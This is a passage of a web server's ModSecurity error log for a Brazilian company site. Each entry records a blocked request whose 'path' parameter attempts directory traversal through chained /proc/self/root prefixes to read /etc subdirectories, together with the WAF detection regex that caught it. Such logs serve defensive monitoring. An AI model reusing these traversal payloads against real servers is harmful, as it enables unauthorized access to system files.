"abhC8_9ocpUE4ed4uDz64gAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:44.420695 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.241.46:51424] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC9KTCbgAP5jq5Teg3vAAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:45.194666 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:57788] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC9aTCbgAP5jq5Teg3vgAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:45.791439 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:51438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC9aTCbgAP5jq5Teg3vwAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:46.635574 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.243.203:57794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC9lajLEzk2WiQ-10dRgAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:47.263472 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.241.46:51454] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC95qj1wV0Si-Okef6TQAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:47.999380 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.243.203:57804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC99SswJuvopo3lOhp4gAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:49.483042 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:57806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC-bABkC4fWIHEf8H67gAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:49.691658 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.241.46:38160] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC-Zqj1wV0Si-Okef6UAAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:50.911084 2026] [:error] [pid 11972:tid 140411616036608] [client 74.7.243.203:41694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC-pqj1wV0Si-Okef6UgAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:51.095492 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:38164] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC-5qj1wV0Si-Okef6UwAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:52.299367 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.243.203:41706] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC_KQpVkWug9HeOt9BhwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:52.319489 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:38172] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC_KQpVkWug9HeOt9BiAAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:53.653520 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.243.203:41720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC_aQpVkWug9HeOt9BigAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:53.764273 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:38180] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC_aQpVkWug9HeOt9BiwAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:54.954571 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.243.203:41734] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC_rysWC90G-1nBrBPtQAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:54.990181 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:38186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhC_v9ocpUE4ed4uDz65wAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:57.382743 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.241.46:38194] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDAHjZBu2q05ozVU9liwAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:50:57.416354 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:41750] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDAP9ocpUE4ed4uDz66gAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:58.928693 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.243.203:41762] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDAlajLEzk2WiQ-10dSAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:50:58.957564 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:51178] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDAv9ocpUE4ed4uDz66wAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:51:00.297506 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.241.46:51180] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhDBJqj1wV0Si-Okef6VQAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:51:01.487465 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.243.203:37152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 